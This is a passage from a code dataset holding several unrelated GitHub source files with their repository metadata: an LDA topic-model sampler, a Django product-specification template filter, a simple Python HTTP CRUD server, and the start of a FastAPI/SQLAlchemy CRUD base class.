sys\r\nimport os\r\nimport pickle\r\n\r\n\r\ndef main ():\r\n\r\n digamma=scipy.special.digamma\r\n print('Please, input document data.')\r\n file1=input()\r\n print('Please, input vocabulary data.')\r\n file2=input()\r\n print('Please, the name of output')\r\n outname=input()\r\n with open(file1,\"rb\")as f0:\r\n documents_stem_id=pickle.load(f0)\r\n with open(file2,\"rb\")as f1:\r\n data=f1.readlines()\r\n V=len(data)\r\n print('Please,input the number of topics')\r\n K=int(input()) #トピック数の指定\r\n print('Please,input the number of epoch')\r\n epoch=int(input()) #トピック数の指定\r\n\r\n D=len(documents_stem_id)#文書数の指定\r\n #V=int(sys.argv[3])#語彙数の指定\r\n N_dk = np.zeros([D,K]) #文書dでトピックkが割り振られた単語数\r\n N_kv = np.zeros([K,V]) #文書集合全体で語彙vにトピックkが割り振られた単語数 \r\n N_k = np.zeros([K,1]) #文書集合全体でトピックkが割り振られた単語数\r\n N_d=np.zeros([D,1])#各ドキュメントの長さ\r\n for d in range(D):\r\n N_d[d]=len(documents_stem_id[d])\r\n #文書dのn番目の単語に付与されたトピック\r\n theta_k_=np.zeros([K])\r\n phi_kv_=np.zeros([K,V])\r\n \r\n z_dn=[]\r\n for d in range(D):\r\n z_dn.append(np.random.randint(0, K,len(documents_stem_id[d])) )\r\n #N_dkとN_kについて\r\n for i in range(len(z_dn[d])):\r\n N_dk[d,z_dn[d][i]]+=1\r\n N_k[z_dn[d][i]]+=1\r\n #N_kvについて \r\n for v,k in zip(documents_stem_id[d],z_dn[d]):\r\n N_kv[k,v]+=1\r\n \r\n alpha=np.ones([K],dtype='float')*50/K\r\n beta=0.1\r\n \r\n for i in range(epoch):\r\n print(\"Epoch: {}\".format(i+1))\r\n numerator_p = 0\r\n denominator_p = 0\r\n loglikelihood=0\r\n for d in range(D):\r\n sys.stdout.write(\"\\r%d / %d\" % (d+1, D))\r\n sys.stdout.flush()\r\n for n in np.random.permutation(len(documents_stem_id[d])):#単語をバラバラに見る\r\n current_topic = z_dn[d][n]\r\n v=documents_stem_id[d][n]\r\n #if(current_topic>0):#自身のカウントを引く\r\n N_dk[d, current_topic] -= 1\r\n N_kv[current_topic, v] -= 1\r\n N_k[current_topic] -= 1\r\n theta_phi=0\r\n if (N_kv[current_topic, v]<0):\r\n print(N_kv[current_topic, v])\r\n \r\n \r\n #サンプリング確率と尤度を計算-----------------------------------------------------------\r\n p_z_dn = np.zeros(K)\r\n theta_phi=0\r\n for k in range(K):\r\n \r\n A = N_dk[d,k] + alpha[k]\r\n B = (N_kv[k,v] + beta)/(N_k[k] + beta*V)\r\n \r\n p = A * B \r\n if(p < 0):\r\n break\r\n p_z_dn[k] = p\r\n \r\n theta_k = (N_dk[d,k]+alpha[k]) / (N_d[d]+alpha[k]*K) # \r\n \r\n theta_k_[k]=theta_k[0]\r\n \r\n phi_kv = (N_kv[k,v]+beta) /(N_k[k]+beta*V) #\r\n phi_kv_[k,v]=phi_kv[0]\r\n theta_phi +=theta_k*phi_kv\r\n \r\n loglikelihood += np.log(theta_phi)\r\n p_z_dn = preprocessing.normalize(p_z_dn.reshape(1, -1), norm=\"l1\")[0] # 正規化\r\n \r\n #-------------------------------------------------------------------------------\r\n \r\n #カテゴリカル分布を使って文書dのn番目の単語のトピックをサンプリング \r\n new_topic=np.argmax(np.random.multinomial(1, p_z_dn, size=1))#最大となるインデックスを返す\r\n z_dn[d][n]=new_topic\r\n \r\n N_dk[d, new_topic] += 1\r\n N_kv[new_topic, v] += 1\r\n N_k[new_topic] += 1\r\n numerator_p += loglikelihood\r\n denominator_p += N_d[d]\r\n \r\n \r\n # パラメータ更新\r\n #α トピック分布用のパラメータ\r\n for k in range(K):\r\n numerator=0\r\n denominator=0\r\n for d in range(D):\r\n numerator +=digamma(N_dk[d][k]+alpha[k])- digamma(alpha[k])\r\n denominator += digamma(N_d[d]+np.sum(alpha))- digamma(np.sum(alpha))\r\n alpha[k] = alpha[k]*(numerator / denominator)\r\n if(alpha[k]<=0):\r\n alpha[k]=0.1\r\n\r\n \r\n \r\n #β 単語分布用のパラメータ\r\n numerator = np.sum(digamma(N_kv+beta)) - K*V*digamma(beta)\r\n denominator = V*(np.sum(digamma(N_k+beta*V)) - K*digamma(beta*V))\r\n beta = beta*(numerator / denominator)\r\n \r\n \r\n #パラメータ出力\r\n print(\"\\nparameters\")\r\n print(\"alpha :{}\".format(alpha))\r\n print(\"beta :{}\".format(beta))\r\n if not os.path.isdir('n_kv'):\r\n os.makedirs('n_kv')\r\n if not os.path.isdir('n_k'):\r\n os.makedirs('n_k')\r\n if not os.path.isdir('n_dk'):\r\n os.makedirs('n_dk') \r\n if not os.path.isdir('theta_k'):\r\n os.makedirs('theta_k') \r\n if not os.path.isdir('phi_kv'):\r\n os.makedirs('phi_kv') \r\n np.savetxt('n_kv/n_kv_{}.txt'.format(outname),N_kv) \r\n np.savetxt('n_k/n_k_{}.txt'.format(outname),N_k)\r\n np.savetxt('n_dk/n_dk_{}.txt'.format(outname),N_dk)\r\n np.savetxt('theta_k/theta_k_{}.txt'.format(outname),theta_k_)\r\n np.savetxt('phi_kv/phi_kv_{}.txt'.format(outname),phi_kv_)\r\n \r\n \r\nif __name__ == \"__main__\":\r\n main () \r\n", "repo_name": "tom9m9m9/lda", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 6138, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "scipy.special.special", "line_number": 18, "usage_type": "attribute"}, {"api_name": "scipy.special", "line_number": 18, "usage_type": "name"}, {"api_name": "pickle.load", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 49, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 58, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 67, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 67, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 68, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 68, "usage_type": "attribute"}, {"api_name": "numpy.random.permutation", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 69, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 102, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.normalize", "line_number": 103, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 103, "usage_type": "name"}, {"api_name": "numpy.argmax", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.random.multinomial", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 108, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 134, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 142, "usage_type": "call"}, {"api_name": "os.path", "line_number": 142, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 143, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 144, "usage_type": "call"}, {"api_name": "os.path", "line_number": 144, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 145, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 146, "usage_type": "call"}, {"api_name": "os.path", "line_number": 146, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 147, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 148, "usage_type": "call"}, {"api_name": "os.path", "line_number": 148, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 149, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 150, "usage_type": "call"}, {"api_name": "os.path", "line_number": 150, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 152, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 154, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 156, "usage_type": "call"}]} +{"seq_id": "11647050223", "text": "from django import template\nfrom django.utils.safestring import mark_safe\n\nfrom products.models import *\n\nregister = template.Library()\n\nTABLE_HEAD = \"\"\"\n \n \n \"\"\"\n\nTABLE_TAIL = \"\"\"\n \n
    \n \"\"\"\n\nTABLE_CONTENT = \"\"\"\n \n {name}\n {value}\n \n \"\"\"\n\nPRODUCT_SPEC = {\n 'notebook': {\n 'Діагональ дисплея': 'display',\n 'Тип накопичувача': 'rom',\n 'Об\\'єм пам\\'яті, Гб': 'rom_capacity',\n 'Тип оперативної пам\\'яті': 'ram',\n 'Об\\'єм оперативної пам\\'яті, Гб': 'rom_capacity',\n 'Час автономної роботи, години': 'battery_lifetime',\n 'Ємніть батареї, Ват-г': 'battery_capacity',\n },\n 'tablet': {\n 'Діагональ дисплея': 'display',\n 'Об\\'єм пам\\'яті, Гб': 'rom_capacity',\n 'Об\\'єм оперативної пам\\'яті, Гб': 'rom_capacity',\n 'Наявність фронтальної камери': 'is_front_cam',\n 'Фронтальна камера, МП': 'front_cam',\n 'Наявність задня камери': 'is_back_cam',\n 'Задня камера, МП': 'back_cam',\n 'Підтримка SD карт': 'is_sd',\n 'Максимальний обсяг пам\\'яті, Гб': 'sd',\n 'Час автономної роботи, години': 'battery_lifetime',\n 'Ємніть батареї, мАг': 'battery_capacity',\n },\n 'personalcomputer': {\n 'Тип накопичувача': 'rom',\n 'Об\\'єм пам\\'яті, Гб': 'rom_capacity',\n 'Тип оперативної пам\\'яті': 'ram',\n 'Об\\'єм оперативної пам\\'яті, Гб': 'rom_capacity',\n },\n 'smartphone': {\n 'Діагональ дисплея': 'display',\n 'Об\\'єм пам\\'яті': 'rom_capacity',\n 'Об\\'єм оперативної пам\\'яті': 'rom_capacity',\n 'Наявність фронтальної камери': 'is_front_cam',\n 'Фронтальна камера': 'front_cam',\n 'Наявність задня камери': 'is_back_cam',\n 'Задня камера': 'back_cam',\n 'Підтримка SD карт': 'is_sd',\n 'Максимальний обсяг пам\\'яті, Гб': 'sd',\n 'Час автономної роботи, години': 'battery_lifetime',\n 'Ємніть батареї, мАг': 'battery_capacity',\n },\n 'tvset': {\n 'Діагональ дисплея': 'display',\n 'Формат екрану': 'ds_type',\n 'Роздільна здатність екрану': 'ds_resolution',\n },\n 'audio': {\n 'Тип': 'audio_type',\n 'Тип підключення': 'connect_type',\n 'Мінімальна частота навушника, Гц': 'min_sound_freq',\n 'Максимальна частота навушника, Гц': 'max_sound_freq',\n },\n}\n\n\ndef get_product_spec(product, model_name):\n table_content = ''\n for name, value in PRODUCT_SPEC[model_name].items():\n table_content += TABLE_CONTENT.format(name=name, value=getattr(product, value))\n return table_content\n\n\n@register.filter\ndef product_spec(product):\n model_name = product.__class__._meta.model_name\n return mark_safe(TABLE_HEAD + get_product_spec(product, model_name) + TABLE_TAIL)\n\n", "repo_name": "mmeerrccyy/eltexua", "sub_path": "products/templatetags/specifications.py", "file_name": "specifications.py", "file_ext": "py", "file_size_in_byte": 3722, "program_lang": "python", "lang": "uk", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.template.Library", "line_number": 6, "usage_type": "call"}, {"api_name": "django.template", "line_number": 6, "usage_type": "name"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 91, "usage_type": "call"}]} +{"seq_id": "12148116609", "text": "#!/usr/bin/python3\n\n'''\nWeb server to accept incomming HTTP requests.\n\nThis will constitute as our \"[C]ontroller\" in the MVC architecture.\n'''\n\nimport re\nimport os\nimport sys\nimport json\nimport time\nimport signal\nimport sqlite3\nimport os.path\nfrom urllib.parse import quote\nfrom urllib.parse import unquote\nfrom urllib.parse import urlparse\nfrom urllib.parse import parse_qs\nfrom http.server import HTTPServer\nfrom http.server import BaseHTTPRequestHandler\nfrom socketserver import ThreadingMixIn\n# from socketserver import ForkingMixIn # This does not work on windows\n# import asyncio # I haven't used this enough. If I have time I\n# might try to utilize it.\n\n\nfrom models import Model\nfrom utils import getMimeTypeFromFile\n\n\nVERSION = '0.0.1'\n\nSTART_TIME = time.time()\n\n\n# TODO: load templates up on start up.\n\n\n# Basic server for handling requests\nclass Controller(BaseHTTPRequestHandler):\n\n ''' I hand rolled this using the standard modules to avoid any dependency issues.\n It was nice learing more about the http.server module even though it is pretty\n low level (at least for Python). Since the BaseHTTPRequestHandler class is\n fairly low level, I have implemented several methods to mimic some basic\n functionaly that would be present in 'out-of-the-box' frameworks.\n\n I typically use frameworks such as Django, Tornado or Flask for Python\n webs development. I like using Gorilla for GoLang web development.\n\n TODO:\n - Add a custom log format. I don't like the default one.\n '''\n\n def redirect(self, path):\n ''' A simple helper method for implementing HTTP redirects '''\n self.send_response(302)\n self.send_header('Location', '/')\n self.end_headers()\n\n def send(self, content, content_type='text/plain', status=200):\n ''' A helper method for sending the HTTP response '''\n self.send_response(status)\n self.send_header(\"Content-type\", content_type)\n self.end_headers()\n if bytes != type(content):\n self.wfile.write(bytes(content, \"UTF-8\"))\n else:\n self.wfile.write(content)\n self.wfile.flush()\n\n # The next few methods are just helpers to keep things clean\n # within our application logic.\n def sendJSON(self, payload, status=200):\n self.send(\n json.dumps(payload),\n content_type='application/json',\n status=status)\n\n def sendHTML(self, content, status=200):\n self.send(content, content_type='text/html', status=status)\n\n def errorNotFound(self, message='Not Found'):\n self.sendJSON({\"status\": \"error\", \"error\": {\n \"message\": message}}, status=404)\n\n def errorMethodNotAllowed(self, message='Method Not Allowed'):\n self.sendJSON({\"status\": \"error\", \"error\": {\n \"message\": message}}, status=405)\n\n def errorMethodBadRequest(self, message='Bad Request'):\n self.sendJSON({\"status\": \"error\", \"error\": {\n \"message\": message}}, status=400)\n\n def sendAPIResponse(self, **kwargs):\n return self.sendJSON({\n \"status\": 'ok' if 200 == kwargs.get('status', 200) else 'error',\n \"data\": kwargs\n }, kwargs.get('status', 200))\n\n def sendStaticFile(self, fpath):\n if os.path.exists(fpath):\n with open(fpath, 'rb') as fh:\n content = fh.read()\n contentType = getMimeTypeFromFile(fpath)[0]\n return self.send(content, content_type=contentType)\n self.errorNotFound()\n\n # This section contains methods to help get/collect parameters\n # sent in the HTTP request.\n @property\n def body(self):\n ''' According to the documentation the BaseHTTPRequestHandler.rfile attribute\n is an io.BufferedIOBase.\n\n I haven't explored this too far but I will go with the assumption that we\n can only read from it once. To avoid any possible issues with multiple reads,\n I will cache the results after the first read.\n '''\n if hasattr(self, '_body'):\n return self._body\n content_len = int(self.headers.get('content-length', 0))\n self._body = self.rfile.read(content_len)\n return self._body\n\n def json(self):\n ''' Parses JSON payloads contained in the request body '''\n if 'application/json' == self.headers.get('content-type'):\n if self.body:\n try:\n return json.loads(self.body)\n except BaseException:\n return {}\n return {}\n\n @property\n def form(self):\n ''' Parses forms contained in the request body '''\n if 'application/x-www-form-urlencoded' == self.headers.get(\n 'content-type'):\n if self.body:\n params = parse_qs(self.body)\n return {\n k.decode(): v[0].decode() for k,\n v in params.items() if v is not None}\n return {}\n\n @property\n def args(self):\n ''' Parses url query string parameters '''\n params = parse_qs(urlparse(self.path).query)\n return {\n k: v[0] for k, v in params.items() if v is not None\n }\n\n @property\n def params(self):\n ''' This merges parameters sent via different methods (JSON, form and query string).\n We will prioritize data sent within the request body.\n '''\n params = {\n **self.args,\n **self.form,\n **self.json().get('params', {})\n }\n # Get any parameters from the URL\n id = self.getModelIDFromRequestURL()\n if id:\n params['id'] = id\n return params\n\n # These two methods are just helper functions for the application logic.\n def getModelIDFromRequestURL(self):\n ''' This extracts the 'name' parameter from the url.\n\n Pretty clunky and room for improvement.\n '''\n url = urlparse(self.path)\n if url.path.startswith('/api/v1/model/'):\n parts = url.path.replace('/api/v1/model/', '').split('/')\n return quote(parts[0])\n elif url.path.startswith('/model/'):\n parts = url.path.replace('/model/', '').split('/')\n return quote(parts[0])\n return None\n\n def getModel(self):\n ''' Fetches the Model object for the given 'name' supplied by the request. '''\n id = self.params.get('id')\n models = Model.fetch(id=id)\n return models[0] if len(models) else None\n\n # Here are the HTTP request handlers.\n # This section contains the bulk for our application logic.\n\n def indexHandler(self):\n ''' HTTP handler for our index path.\n\n This technically our [V]iew in the MVC architecture.\n\n In a 'simple' MVC website we might construct different views for each action\n a user could do. I decided to take some liberties here and create a more dynamic\n website, were all the functional requirements are folded together into a single\n page.\n\n Instead of using Python to generate raw HTML, I decided to push this job\n to a front end framework called Vue (https://vuejs.org/v2/guide/index.html).\n I felt this would better demonstrate some modern web development approaches\n as well as my full stack development capabilities.\n '''\n fpath = os.path.join('tmpl', 'page.html')\n with open(fpath) as fh:\n tmpl = fh.read()\n data = [model.toDict() for model in Model.fetch(**self.params)]\n page = tmpl.replace('{{models}}', json.dumps(data))\n self.sendHTML(page)\n\n def pingHandler(self):\n self.sendAPIResponse(\n version=VERSION,\n start_time=START_TIME,\n up_time=time.time() - START_TIME\n )\n\n # This is a more traditional \"View\" for MVC.\n def modelHandler(self, message=''):\n model = self.getModel()\n if model:\n fpath = os.path.join('tmpl', 'model.html')\n with open(fpath) as fh:\n tmpl = fh.read()\n page = tmpl.format(**model.toDict(), message=message)\n return self.sendHTML(page)\n self.errorNotFound()\n\n def updateModel(self):\n model = self.getModel()\n if model:\n params = self.params\n model.color = params.get('color', model.color)\n model.make = params.get('make', model.make)\n model.status = params.get('status', model.status)\n model.save()\n return model\n\n def do_HEAD(self):\n return\n\n def do_POST(self):\n ''' An HTTP handler for the [C]reate method in the CRUD application. '''\n url = urlparse(self.path)\n\n # Handle redirects\n if '/' == url.path:\n return self.indexHandler()\n\n elif url.path in ['/api/v1/model', '/create']:\n try:\n # Create new model\n model = Model(**self.params)\n model.save()\n\n # Depending on endpoint return api response or redirect.\n if '/api/v1/model' == url.path:\n return self.sendAPIResponse(model=model.toDict())\n else:\n return self.redirect('/')\n\n except Exception as e:\n return self.errorMethodBadRequest(str(e))\n\n # I did not realize PUT was not allowed in forms...\n elif re.match(r'^/model/[^/]+$', url.path):\n if self.updateModel():\n return self.modelHandler(message='Model updated')\n\n self.errorNotFound()\n\n def do_GET(self):\n ''' An HTTP handler for the [R]ead method in the CRUD application. '''\n url = urlparse(self.path)\n\n # Handle redirects\n if '/' == url.path:\n return self.indexHandler()\n\n # Handler static assets...\n # TODO: Add a better handler for static folders.\n elif url.path.startswith('/static/'):\n parts = url.path.split('/')\n fpath = os.path.join(*[part for part in parts if part])\n return self.sendStaticFile(fpath)\n\n # It's always nice to include a route for health checks.\n elif '/ping' == url.path:\n return self.pingHandler()\n\n # This is a more traditional 'View' for MVC.\n elif re.match(r'^/model/[^/]+$', url.path):\n return self.modelHandler()\n\n # Basic API endpoints for testing\n elif '/api/v1/models' == url.path:\n return self.sendAPIResponse(models=[\n model.toDict() for model in Model.fetch(**self.params)\n ])\n\n elif re.match(r'^/api/v1/model/[^/]+$', url.path):\n model = self.getModel()\n if model:\n return self.sendAPIResponse(model=model.toDict())\n\n self.errorNotFound()\n\n def do_PUT(self):\n ''' An HTTP handler for the [U]pdate method in the CRUD application. '''\n url = urlparse(self.path)\n\n _isApiRequest = re.match(r'^/api/v1/model/[^/]+$', url.path)\n\n # Handle redirects\n if '/' == url.path:\n return self.indexHandler()\n\n elif _isApiRequest or re.match(r'^/model/[^/]+$', url.path):\n model = self.updateModel()\n if model:\n # Depending on endpoint return api response or redirect.\n if _isApiRequest:\n return self.sendAPIResponse(model=model.toDict())\n else:\n self.modelHandler(message='Model updated')\n\n self.errorNotFound()\n\n def do_DELETE(self):\n ''' An HTTP handler for the [D]elete method in the CRUD application. '''\n url = urlparse(self.path)\n\n # Handle redirects\n if '/' == url.path:\n return self.indexHandler()\n\n elif url.path.startswith('/api/v1/model/') or re.match(r'^/model/[^/]+$', url.path):\n model = self.getModel()\n if model:\n model.delete()\n if url.path.startswith('/api/v1/model/'):\n return self.sendAPIResponse()\n else:\n return self.redirect('/')\n\n self.errorNotFound()\n\n\nclass ThreadingSimpleServer(ThreadingMixIn, HTTPServer):\n ''' SQLite did not like the ThreadingMixIn when we had a single persistent\n database connection. I was going to scrap this and just use the plain\n HTTPServer, but unfortunately I would get the occasional hang when using\n multiple browser tabs.\n\n This will occasionally deadlock when it is shutting down. I looked around\n but haven't found a good solution yet. Due to this issue I would probably\n look into using the asyncio module (or something similar) for future projects.\n '''\n pass\n\n\n# This is not supported for windows... sad day :(\n# class ForkingHTTPServer(ForkingMixIn, HTTPServer):\n# '''\n# I was seeing that the HTTPServer was hanging on multiple\n# requests due to them blocking eachother.\n# The ForkingMixIn seems to have fixed these issues.\n# '''\n# pass\n\n\n\n# Listen and serve on specified host and port\ndef start(host='localhost', port=8080):\n # server = HTTPServer((host, port), Controller)\n # server = ForkingHTTPServer((host, port), Controller)\n server = ThreadingSimpleServer((host, port), Controller)\n\n # This addresses the occasional issue when the port does not\n # get released on shutdown.\n server.allow_reuse_address = True\n\n # It looks like this parameter fixes the deadlock I was running into\n # https://docs.python.org/3/library/socketserver.html#socketserver.ThreadingMixIn\n # server.block_on_close = False\n server.daemon_threads = True\n\n print(\"Starting server at http://{0}:{1}\".format(host, port))\n\n try:\n server.serve_forever()\n except KeyboardInterrupt:\n pass\n finally:\n server.server_close()\n\n print(\"Server stopped\")\n", "repo_name": "sjsafranek/dev_project_09082021", "sub_path": "server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 14090, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "time.time", "line_number": 35, "usage_type": "call"}, {"api_name": "http.server.BaseHTTPRequestHandler", "line_number": 42, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 104, "usage_type": "call"}, {"api_name": "os.path", "line_number": 104, "usage_type": "attribute"}, {"api_name": "utils.getMimeTypeFromFile", "line_number": 107, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 133, "usage_type": "call"}, {"api_name": "urllib.parse.parse_qs", "line_number": 144, "usage_type": "call"}, {"api_name": "urllib.parse.parse_qs", "line_number": 153, "usage_type": "call"}, {"api_name": "urllib.parse.urlparse", "line_number": 153, "usage_type": "call"}, {"api_name": "urllib.parse.urlparse", "line_number": 180, "usage_type": "call"}, {"api_name": "urllib.parse.quote", "line_number": 183, "usage_type": "call"}, {"api_name": "urllib.parse.quote", "line_number": 186, "usage_type": "call"}, {"api_name": "models.Model.fetch", "line_number": 192, "usage_type": "call"}, {"api_name": "models.Model", "line_number": 192, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 213, "usage_type": "call"}, {"api_name": "os.path", "line_number": 213, "usage_type": "attribute"}, {"api_name": "models.Model.fetch", "line_number": 216, "usage_type": "call"}, {"api_name": "models.Model", "line_number": 216, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 217, "usage_type": "call"}, {"api_name": "time.time", "line_number": 224, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 231, "usage_type": "call"}, {"api_name": "os.path", "line_number": 231, "usage_type": "attribute"}, {"api_name": "urllib.parse.urlparse", "line_number": 253, "usage_type": "call"}, {"api_name": "models.Model", "line_number": 262, "usage_type": "call"}, {"api_name": "re.match", "line_number": 275, "usage_type": "call"}, {"api_name": "urllib.parse.urlparse", "line_number": 283, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 293, "usage_type": "call"}, {"api_name": "os.path", "line_number": 293, "usage_type": "attribute"}, {"api_name": "re.match", "line_number": 301, "usage_type": "call"}, {"api_name": "models.Model.fetch", "line_number": 307, "usage_type": "call"}, {"api_name": "models.Model", "line_number": 307, "usage_type": "name"}, {"api_name": "re.match", "line_number": 310, "usage_type": "call"}, {"api_name": "urllib.parse.urlparse", "line_number": 319, "usage_type": "call"}, {"api_name": "re.match", "line_number": 321, "usage_type": "call"}, {"api_name": "re.match", "line_number": 327, "usage_type": "call"}, {"api_name": "urllib.parse.urlparse", "line_number": 340, "usage_type": "call"}, {"api_name": "re.match", "line_number": 346, "usage_type": "call"}, {"api_name": "socketserver.ThreadingMixIn", "line_number": 358, "usage_type": "name"}, {"api_name": "http.server.HTTPServer", "line_number": 358, "usage_type": "name"}]} +{"seq_id": "22840191329", "text": "from typing import Any, Generic, Type, TypeVar\nfrom fastapi import HTTPException\nfrom fastapi.encoders import jsonable_encoder\nfrom pydantic import BaseModel\nfrom sqlalchemy import select, and_\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy.sql.expression import Select\nfrom pathlib import Path\n\nfrom app.db.base import Base\nfrom app.db.filter import apply_filters\nfrom app.db.sort import apply_sort\nfrom app.db.paginate import apply_pagination\nfrom app.db.session import db_session, engine, db_schema\nfrom app.core.permissions import permission_exception, has_permission\nfrom app.core.enums import Permission\nfrom app.models.user import User\n\n# SQLAlchemy model type for the main object. Ex: \"OppStage\"\nModel = TypeVar(\"Model\", bound=Base)\n\n# SQLAlchemy model type for the descriptions object. Ex: \"OppStageDescription\"\nModelDescription = TypeVar(\"ModelDescription\", bound=Base)\n\n# Pydantic model type for Create. Ex: \"OppStageCreate\"\nCreateSchema = TypeVar(\"CreateSchema\", bound=BaseModel)\n\n# Pydantic model type for Update. Ex: \"OppStageUpdate\"\nUpdateSchema = TypeVar(\"UpdateSchema\", bound=BaseModel)\n\n# Base CRUD class with default methods for Create, Read, Update, Delete (CRUD) operations\nclass CRUDBase(Generic[Model, CreateSchema, UpdateSchema]):\n def __init__(self, model: Type[Model]) -> None:\n self.model = model\n\n def get(self, db: Session, id: Any, user: User) -> Model | None:\n \"\"\"Returns the record based on the ID\"\"\"\n db_session.set(db)\n\n result = db.execute(select(self.model).where(self.model.id == id)).scalars().one_or_none()\n if result is not None:\n if not has_permission(user=user, resource=result, permission=Permission.read):\n raise permission_exception\n\n return result\n\n def get_all(\n self,\n db: Session,\n filter_spec: list[dict] | dict,\n sort_spec: list[dict] | dict,\n offset: int,\n limit: int,\n user: User,\n query: Select | None = None,\n ):\n \"\"\"Returns all records\"\"\"\n if query is None:\n query = select(self.model)\n\n if filter_spec:\n query = apply_filters(query=query, default_model=self.model, filter_spec=filter_spec) # type: ignore\n\n if sort_spec:\n query = apply_sort(query=query, default_model=self.model, sort_spec=sort_spec) # type: ignore\n\n query, pagination = apply_pagination(db=db, query=query, offset=offset, limit=limit) # type: ignore\n\n if pagination.total == 0:\n raise HTTPException(status_code=404, detail=\"No records were found.\")\n\n return {\n \"items\": db.execute(query).scalars().all(),\n \"total\": pagination.total,\n \"page\": pagination.page,\n \"size\": pagination.size,\n }\n\n def create(self, db: Session, obj_in: CreateSchema, user: User) -> Model:\n \"\"\"Creates the record\"\"\"\n db_session.set(db)\n db_obj = self.model(**obj_in.dict(), created_by_id=user.id)\n\n if not has_permission(user=user, resource=db_obj, permission=Permission.create):\n raise permission_exception\n\n db.add(db_obj)\n db.commit()\n db.refresh(db_obj)\n return db_obj\n\n def update(self, db: Session, db_obj: Model, obj_in: UpdateSchema, user: User) -> Model:\n \"\"\"Updates the record\"\"\"\n db_session.set(db)\n\n if not has_permission(user=user, resource=db_obj, permission=Permission.update):\n raise permission_exception\n\n obj_data = jsonable_encoder(db_obj)\n update_data = obj_in.dict(exclude_unset=True)\n\n for field in update_data:\n if field in obj_data:\n setattr(db_obj, field, update_data[field])\n db_obj.updated_by_id = user.id\n\n db.add(db_obj)\n db.commit()\n db.refresh(db_obj)\n return db_obj\n\n def delete(self, db: Session, db_obj: Model, user: User) -> None:\n \"\"\"Deletes the record\"\"\"\n db_session.set(db)\n\n if not has_permission(user=user, resource=db_obj, permission=Permission.delete):\n raise permission_exception\n\n db.delete(db_obj)\n db.commit()\n\n def bulk_create(self, user: User, filepath: Path) -> None:\n \"\"\"Creates records in bulk using psycopg's COPY FROM functionality\"\"\"\n schema = db_schema.get()\n\n with filepath.open(\"r\") as f:\n conn = engine.raw_connection()\n cursor = conn.cursor()\n cmd = None\n\n if self.model.__name__ == \"Account\":\n cmd = f\"\"\"COPY {schema}.account (external_id, source_url, name, annual_revenue, \n annual_revenue_curr_code, number_of_employees, street, address_line_2, \n address_line_3, city, state, country_code, postal_code, fax, email, \n phone, website, industry_id, is_active, created_by_id) \n FROM STDIN WITH (FORMAT CSV, HEADER TRUE)\"\"\"\n\n if self.model.__name__ == \"Opportunity\":\n cmd = f\"\"\"COPY {schema}.opportunity (external_id, name, account_id, \n expected_amount, expected_amount_curr_code, start_date, close_date, \n owner_id, probability, stage_id, status, created_by_id) \n FROM STDIN WITH (FORMAT CSV, HEADER TRUE)\"\"\"\n\n cursor.copy_expert(cmd, f) # type: ignore\n conn.commit()\n\n\n# Extends the Create and Update methods in the Base CRUD class for objects with associated descriptions object\nclass CRUDBaseDesc(\n CRUDBase[Model, CreateSchema, UpdateSchema],\n Generic[Model, ModelDescription, CreateSchema, UpdateSchema],\n):\n def __init__(self, model: Type[Model], model_description: Type[ModelDescription]) -> None:\n self.model = model\n self.model_description = model_description\n\n def create(self, db: Session, obj_in: CreateSchema, user: User) -> Model:\n \"\"\"Creates the record and the associated descriptions\"\"\"\n 